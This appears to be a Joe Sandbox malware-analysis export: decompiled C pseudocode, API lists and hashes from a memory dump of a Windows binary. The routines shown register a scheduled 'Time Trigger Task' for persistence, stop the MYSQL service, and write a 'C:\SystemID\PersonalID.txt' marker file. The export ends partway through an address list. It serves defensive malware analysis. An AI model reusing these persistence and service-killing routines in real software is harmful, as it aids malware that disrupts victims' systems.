0x004181b6
0x004181bc
0x004181b8
0x004181b8
0x004181b8
0x004181be
0x004181c1
0x004181c7
0x004181c3
0x004181c3
0x004181c3
0x004181c9
0x004181cb
0x004181d6
0x004181d7
0x004181d8
0x00000000
0x004181d8
0x004181cb
0x004180f7
0x004180f7
0x004180fa
0x004180fd
0x00418106
0x004180ff
0x00418101
0x00418101
0x00418109
0x0041810c
0x00418112
0x0041810e
0x0041810e
0x0041810e
0x00418114
0x00418116
0x0041811b
0x00418124
0x00418129
0x0041812c
0x0041812c
0x0041812f
0x00418132
0x00418135
0x0041813e
0x00418137
0x00418139
0x00418139
0x00418141
0x00418144
0x0041814a
0x00418146
0x00418146
0x00418146
0x0041814c
0x0041814f
0x00418151
0x00418157
0x0041815f
0x00418163
0x00418304
0x00418304
0x00418305
0x00000000
0x00418305
0x00418151
0x0041807e
0x00418082
0x0041808e
0x00418084
0x00418086
0x00418089
0x00418089
0x00418095
0x004180a1
0x00418097
0x00418099
0x0041809c
0x0041809c
0x004180a6
0x004180b9
0x004180be
0x004180c1
0x004180c1
0x004180c8
0x004180ca
0x004180ca
0x004180d0
0x004180d6
0x004180d2
0x004180d2
0x004180d2
0x004180da
0x004180e9
0x0041830a
0x0041830a
0x004180da
0x00418311
0x00418314
0x00418318
0x0041832a
0x0041832e
0x00418335
0x0041831a
0x0041831d
0x00418327
0x00418327
0x00418318
0x0041804f
0x00418022

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

string too long, xrefs: 00418338
invalid string position, xrefs: 00418342

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160
comstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040DAC0(char _a4, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				intOrPtr _v60;
				intOrPtr _v76;
				short _v84;
				intOrPtr _v88;
				char _v92;
				short _v20572;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t87;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr _t129;

				 *[fs:0x0] = _t129;
				_t61 = E0042F7C0(0x504c);
				_v8 = 0;
				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
				if(_t61 >= 0) {
					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
					_t63 = _v24;
					_push( &_v20);
					_push(0x4d4f8c);
					_push(0x4d4f9c);
					_push(L"Time Trigger Task");
					_push(_t63);
					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
						_t98 = _v24;
						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
						_t100 = _v24;
						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
					}
					_t65 = _v20;
					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
					_t67 = _v36;
					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
					_t69 = _v20;
					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
					_t71 = _v20;
					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
					_t73 = _v20;
					_t122 =  >=  ? _a4 :  &_a4;
					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
					_t75 = _v20;
					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
					_t78 =  >=  ? _a4 :  &_a4;
					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
					PathRemoveFileSpecW( &_v20572);
					_t83 = _v20;
					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
					_t85 = _v20;
					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
					_t87 = _v20;
					_v28 = 0;
					_v32 = 0;
					_v40 = 0;
					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
					E0042B420( &_v92, 0, 0x30);
					_v88 = 0xb07e2;
					_v92 = 0x30;
					_t129 = _t129 + 0xc;
					_v84 = 1;
					_t93 = _v28;
					_v76 = 0x21000c;
					_v60 = 0;
					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
					_t95 = _v20;
					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
					_t97 = _v32;
					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
					__imp__CoUninitialize();
				}
				if(_a24 >= 8) {
					_t61 = L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t61;
			}

0x0040dad6
0x0040dadd
0x0040dae4
0x0040daeb
0x0040daf3
0x0040db0b
0x0040db11
0x0040db17
0x0040db18
0x0040db1d
0x0040db24
0x0040db29
0x0040db2f
0x0040db31
0x0040db3c
0x0040db3f
0x0040db58
0x0040db58
0x0040db5b
0x0040db6a
0x0040db6c
0x0040db76
0x0040db79
0x0040db88
0x0040db8a
0x0040db97
0x0040db9a
0x0040dba4
0x0040dbac
0x0040dbb2
0x0040dbbd
0x0040dbca
0x0040dbd6
0x0040dbe3
0x0040dbe9
0x0040dbf6
0x0040dbfc
0x0040dc07
0x0040dc0a
0x0040dc11
0x0040dc1b
0x0040dc22
0x0040dc2d
0x0040dc38
0x0040dc42
0x0040dc49
0x0040dc4d
0x0040dc55
0x0040dc5c
0x0040dc5f
0x0040dc66
0x0040dc71
0x0040dc74
0x0040dc83
0x0040dc85
0x0040dc8f
0x0040dc92
0x0040dc92
0x0040dc9c
0x0040dca1
0x0040dca6
0x0040dcac
0x0040dcb6

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32 ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

--Task, xrefs: 0040DBB5
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52
Comment, xrefs: 0040DBFF

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: a952cf49ba026668ef61038e911d8e9ba8e44f2ebfb21b674e42d3fec6852e8d
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: a952cf49ba026668ef61038e911d8e9ba8e44f2ebfb21b674e42d3fec6852e8d
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411A10() {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t9;
				int _t10;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t23;
				void* _t26;

				_t9 = OpenSCManagerW(0, 0, 1);
				_t19 = _t9;
				if(_t19 != 0) {
					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
					_t26 = _t10;
					if(_t26 == 0) {
						L12:
						return _t10;
					}
					if(ControlService(_t26, 1,  &_v32) == 0) {
						L11:
						_t10 = CloseServiceHandle(_t19);
						goto L12;
					}
					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
						L10:
						CloseServiceHandle(_t26);
						goto L11;
					} else {
						_t16 = _v12;
						do {
							_t23 = _t16;
							Sleep(_v8);
							if(QueryServiceStatus(_t26,  &_v32) == 0) {
								break;
							}
							_t16 = _v12;
						} while (_t16 >= _t23 && _v28 != 1);
						goto L10;
					}
				}
				return _t9;
			}

0x00411a1d
0x00411a23
0x00411a27
0x00411a32
0x00411a38
0x00411a3c
0x00411aa4
0x00000000
0x00411aa4
0x00411a54
0x00411aa0
0x00411aa1
0x00000000
0x00411aa3
0x00411a63
0x00411a9d
0x00411a9e
0x00000000
0x00411a6b
0x00411a6b
0x00411a70
0x00411a73
0x00411a75
0x00411a88
0x00000000
0x00000000
0x00411a8a
0x00411a8d
0x00000000
0x00411a97
0x00411a63
0x00411aa9

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0044F26C(void* __eflags, char _a4) {
				char _v16;
				char _v24;
				char _v44;
				intOrPtr _v52;
				char _v76;
				char _v84;
				char _v104;
				void* _t50;
				void* _t51;

				_t51 = _t50 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6560;
				E00430ECA( &_v16, 0x508238);
				asm("int3");
				_push(_t50);
				E00430CFC( &_v44,  &_v24);
				_v44 = 0x4d6578;
				E00430ECA( &_v44, 0x508274);
				asm("int3");
				_push(_t51);
				E0044EF74( &_v76, _v52);
				E00430ECA( &_v76, 0x508320);
				asm("int3");
				_push(_t51 - 0xc);
				E00430CFC( &_v104,  &_v84);
				_v104 = 0x4d656c;
				E00430ECA( &_v104, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00465480(char* _a4, char* _a8) {
				signed int _v8;
				short _v24;
				int _v28;
				int _v32;
				short* _v36;
				void* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				char _t27;
				int _t28;
				signed int _t29;
				short* _t32;
				signed int _t41;
				int _t58;
				char* _t59;
				char* _t60;
				char* _t64;
				char* _t68;
				char* _t69;
				signed int _t71;
				short* _t72;
				void* _t85;

				E0042F7C0(0x20);
				_t25 =  *0x50ad20; // 0x727261cc
				_v8 = _t25 ^ _t71;
				_t59 = _a8;
				_t69 = _a4;
				_t60 = _t69;
				_t68 =  &(_t60[1]);
				do {
					_t27 =  *_t60;
					_t60 =  &(_t60[1]);
				} while (_t27 != 0);
				_v28 = 8;
				_t28 = _t60 - _t68 + 1;
				_v32 = _t28;
				_t29 = MultiByteToWideChar(0xfde9, 8, _t69, _t28, 0, 0);
				_t70 = _t29;
				if(_t29 > 0) {
					L6:
					E0043F980(_t70 + _t70);
					_t32 = _t72;
					_t70 = MultiByteToWideChar;
					_v36 = _t32;
					__eflags = MultiByteToWideChar(0xfde9, _v28, _t69, _v32, _t32, MultiByteToWideChar);
					if(__eflags == 0) {
						goto L18;
					} else {
						_t64 = _t59;
						_t68 =  &(_t64[1]);
						do {
							_t41 =  *_t64;
							_t64 =  &(_t64[1]);
							__eflags = _t41;
						} while (_t41 != 0);
						__eflags = MultiByteToWideChar(0xfde9, 0, _t59, _t64 - _t68 + 1,  &_v24, 8);
						if(__eflags == 0) {
							goto L18;
						} else {
							_t70 = E00420FDD(_v36,  &_v24);
							_t72 =  &(_t72[4]);
							__eflags = _t70;
							if(__eflags != 0) {
								goto L15;
							} else {
								__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 2;
								if(__eflags == 0) {
									goto L14;
								} else {
									__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 9;
									goto L13;
								}
							}
						}
					}
				} else {
					if(GetLastError() != 0x3ec) {
						L5:
						_t85 = GetLastError() - 0x459;
						L13:
						if(_t85 != 0) {
							L18:
							E004512D0(_t59, _t68, _t69, _t71, __eflags, 2, 1, GetLastError(), ".\\crypto\\bio\\bss_file.c", 0xa9);
							_push("\')");
							_push(_t59);
							_push("\',\'");
							_push(_t69);
							E004504A0(5, "fopen(\'");
							__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 2;
							if(__eflags != 0) {
								_push(0xae);
								_push(".\\crypto\\bio\\bss_file.c");
								_push(2);
							} else {
								_push(0xac);
								_push(".\\crypto\\bio\\bss_file.c");
								_push(0x80);
							}
							_push(0x6d);
							_push(0x20);
							E004512D0(_t59, _t68, _t69, _t71, __eflags);
							goto L22;
						} else {
							L14:
							_t70 = E004220B6(_t69, _t59);
							_t72 =  &(_t72[4]);
							if(_t70 == 0) {
								goto L18;
							} else {
								L15:
								_t69 = E0044F960(_t59, _t68, 0x50f2e0);
								_t87 = _t69;
								if(_t69 != 0) {
									E0044F3B0(_t69, 0);
									E0044F3E0(_t69, _t71, _t69, 0x6a, 1, _t70);
									__eflags = _v8 ^ _t71;
									return E0042A77E(_t59, _v8 ^ _t71, _t68, _t69, _t70);
								} else {
									_push(_t70);
									E00423A38(_t59, _t69, _t70, _t87);
									L22:
									return E0042A77E(_t59, _v8 ^ _t71, _t68, _t69, _t70);
								}
							}
						}
					} else {
						_v28 = 0;
						_t58 = MultiByteToWideChar(0xfde9, 0, _t69, _v32, 0, 0);
						_t70 = _t58;
						if(_t58 > 0) {
							goto L6;
						} else {
							goto L5;
						}
					}
				}
			}

0x00465488
0x0046548d
0x00465494
0x00465498
0x0046549d
0x004654a0
0x004654a2
0x004654a5
0x004654a5
0x004654a7
0x004654a8
0x004654b0
0x004654b9
0x004654c5
0x004654c8
0x004654ce
0x004654d2
0x00465510
0x00465513
0x00465518
0x0046551b
0x00465525
0x00465533
0x00465535
0x00000000
0x0046553b
0x0046553b
0x0046553d
0x00465540
0x00465540
0x00465542
0x00465543
0x00465543
0x0046555d
0x0046555f
0x00000000
0x00465565
0x00465571
0x00465573
0x00465576
0x00465578
0x00000000
0x0046557a
0x0046557f
0x00465582
0x00000000
0x00465584
0x00465589
0x00000000
0x00465589
0x00465582
0x00465578
0x0046555f
0x004654d4
0x004654df
0x00465503
0x00465509
0x0046558c
0x0046558c
0x004655eb
0x00465600
0x00465605
0x0046560a
0x0046560b
0x00465610
0x00465618
0x00465625
0x00465628
0x0046563b
0x00465640
0x00465645
0x0046562a
0x0046562a
0x0046562f
0x00465634
0x00465634
0x00465647
0x00465649
0x0046564b
0x00000000
0x0046558e
0x0046558e
0x00465595
0x00465597
0x0046559c
0x00000000
0x0046559e
0x0046559e
0x004655a8
0x004655ad
0x004655af
0x004655c2
0x004655cd
0x004655e0
0x004655ea
0x004655b1
0x004655b1
0x004655b2
0x00465653
0x00465668
0x00465668
0x004655af
0x0046559c
0x004654e1
0x004654e8
0x004654f7
0x004654fd
0x00465501
0x00000000
0x00000000
0x00000000
0x00000000
0x00465501
0x004654df

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
GetLastError.KERNEL32(?,?,00000000), ref: 00465503
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5

Strings

.\crypto\bio\bss_file.c, xrefs: 004655F0, 0046562F, 00465640
fopen(', xrefs: 00465611
',', xrefs: 0046560B

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: ','$.\crypto\bio\bss_file.c$fopen('
API String ID: 1717984340-2085858615
Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				struct _SECURITY_ATTRIBUTES* _v56;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t86;
				void* _t92;
				void* _t95;
				void* _t96;
				signed int _t98;
				struct _SECURITY_ATTRIBUTES** _t101;
				DWORD* _t109;
				void* _t117;
				signed int _t121;
				intOrPtr _t123;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t138;
				intOrPtr _t141;
				signed int _t142;
				signed int _t143;
				intOrPtr _t144;
				signed int _t146;
				signed int _t147;
				signed int _t150;
				intOrPtr _t151;
				void* _t153;
				void* _t155;
				void* _t156;

				_push(0xffffffff);
				_push(0x4ca7b8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				_v8 = 0;
				_t121 = 0;
				_t138 = 0;
				_v32 = 0;
				_t141 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 1;
				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r");
				_t153 = _t151 - 0x130 + 8;
				_v20 = _t77;
				if(_t77 == 0) {
					L28:
					_t142 = _t121;
					if(_t121 == _t138) {
						L32:
						CreateDirectoryW(L"C:\\SystemID", 0);
						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w");
						_t153 = _t153 + 8;
						_v20 = _t79;
						if(_t79 != 0) {
							_t143 = _t121;
							__eflags = _t121 - _t138;
							if(_t121 == _t138) {
								L47:
								__eflags = _a24 - 8;
								_t144 = _v20;
								_t81 =  >=  ? _a4 :  &_a4;
								_push(_t144);
								_push( >=  ? _a4 :  &_a4);
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_push("\n");
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_t79 = E00423A38(_t121, _t138, _t144, __eflags);
								_t153 = _t153 + 0x14;
								__eflags = _t121;
								if(_t121 == 0) {
									L54:
									if(_a24 >= 8) {
										_t79 = L00422587(_a4);
									}
									 *[fs:0x0] = _v16;
									return _t79;
								}
								_t146 = _t121;
								__eflags = _t121 - _t138;
								if(_t121 == _t138) {
									L53:
									_t79 = L00422587(_t121);
									_t153 = _t153 + 4;
									goto L54;
								}
								do {
									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
										L00422587( *_t146);
										_t153 = _t153 + 4;
									}
									 *((intOrPtr*)(_t146 + 0x14)) = 7;
									 *(_t146 + 0x10) = 0;
									 *_t146 = 0;
									_t146 = _t146 + 0x18;
									__eflags = _t146 - _t138;
								} while (_t146 != _t138);
								goto L53;
							}
							_t123 = _v20;
							do {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
								if(__eflags < 0) {
									_t86 = _t143;
								} else {
									_t86 =  *_t143;
								}
								_push(_t123);
								_push(_t86);
								E004228FD(_t123, _t135, _t138, _t143, __eflags);
								_t143 = _t143 + 0x18;
								_t153 = _t153 + 8;
								__eflags = _t143 - _t138;
							} while (_t143 != _t138);
							_t121 = _v32;
							goto L47;
						}
						L33:
						if(_t121 == 0) {
							goto L54;
						}
						_t147 = _t121;
						if(_t121 == _t138) {
							goto L53;
						}
						do {
							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
								L00422587( *_t147);
								_t153 = _t153 + 4;
							}
							 *((intOrPtr*)(_t147 + 0x14)) = 7;
							 *(_t147 + 0x10) = 0;
							 *_t147 = 0;
							_t147 = _t147 + 0x18;
						} while (_t147 != _t138);
						goto L53;
					}
					while(1) {
						_t91 =  >=  ? _a4 :  &_a4;
						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
						if(_t79 != 0xffffffff) {
							goto L33;
						}
						_t142 = _t142 + 0x18;
						if(_t142 != _t138) {
							continue;
						}
						goto L32;
					}
					goto L33;
				}
				_t92 = E00420546(_t77);
				_t155 = _t153 + 4;
				_t158 = _t92;
				if(_t92 != 0) {
					L27:
					_push(_v20);
					E00423A38(_t121, _t138, _t141, _t166);
					_t153 = _t155 + 4;
					goto L28;
				} else {
					do {
						_push(_v20);
						_push(0x7e);
						_push( &_v316);
						_t95 = E00421101(_t121, _t138, _t141, _t158);
						_t156 = _t155 + 0xc;
						if(_t95 == 0) {
							goto L26;
						}
						_v36 = 7;
						_v40 = 0;
						_v56 = 0;
						if(_v316 != 0) {
							_t126 =  &_v316;
							_t135 = _t126 + 2;
							do {
								_t98 =  *_t126;
								_t126 = _t126 + 2;
								__eflags = _t98;
							} while (_t98 != 0);
							_t127 = _t126 - _t135;
							__eflags = _t127;
							_t128 = _t127 >> 1;
							goto L9;
						} else {
							_t128 = 0;
							L9:
							_push(_t128);
							_t129 =  &_v56;
							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
							_t101 =  &_v56;
							_v8 = 2;
							if(_t101 >= _t138 || _t121 > _t101) {
								__eflags = _t138 - _t141;
								if(_t138 == _t141) {
									E00414F70(_t121,  &_v32, _t138, _t129);
									_t138 = _v28;
									_t121 = _v32;
								}
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)(_t138 + 0x14)) = 7;
									 *(_t138 + 0x10) = 0;
									 *_t138 = 0;
									__eflags = _v36 - 8;
									if(_v36 >= 8) {
										 *_t138 = _v56;
										_v56 = 0;
									} else {
										_t109 =  &(_v40->nLength);
										__eflags = _t109;
										if(_t109 != 0) {
											E004205A0(_t138,  &_v56, _t109 + _t109);
											_t156 = _t156 + 0xc;
										}
									}
									 *(_t138 + 0x10) = _v40;
									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
									__eflags = 0;
									_v36 = 7;
									_v40 = 0;
									_v56 = 0;
								}
							} else {
								_t132 = _t101 - _t121;
								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
								if(_t138 == _v24) {
									E00414F70(_t121,  &_v32, _t138, _t132);
									_t138 = _v28;
									_t121 = _v32;
								}
								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
								if(_t138 != 0) {
									E00413160(_t138, _t117);
								}
							}
							_t138 = _t138 + 0x18;
							_v8 = 1;
							_v28 = _t138;
							if(_v36 >= 8) {
								L00422587(_v56);
								_t156 = _t156 + 4;
							}
							_t141 = _v24;
						}
						L26:
						_t96 = E00420546(_v20);
						_t155 = _t156 + 4;
						_t166 = _t96;
					} while (_t96 == 0);
					goto L27;
				}
			}

0x0040c743
0x0040c745
0x0040c750
0x0040c751
0x0040c761
0x0040c768
0x0040c76a
0x0040c76c
0x0040c76f
0x0040c771
0x0040c774
0x0040c781
0x0040c785
0x0040c78a
0x0040c78d
0x0040c792
0x0040c911
0x0040c911
0x0040c915
0x0040c944
0x0040c94b
0x0040c95b
0x0040c960
0x0040c963
0x0040c968
0x0040c9af
0x0040c9b1
0x0040c9b3
0x0040c9d8
0x0040c9d8
0x0040c9df
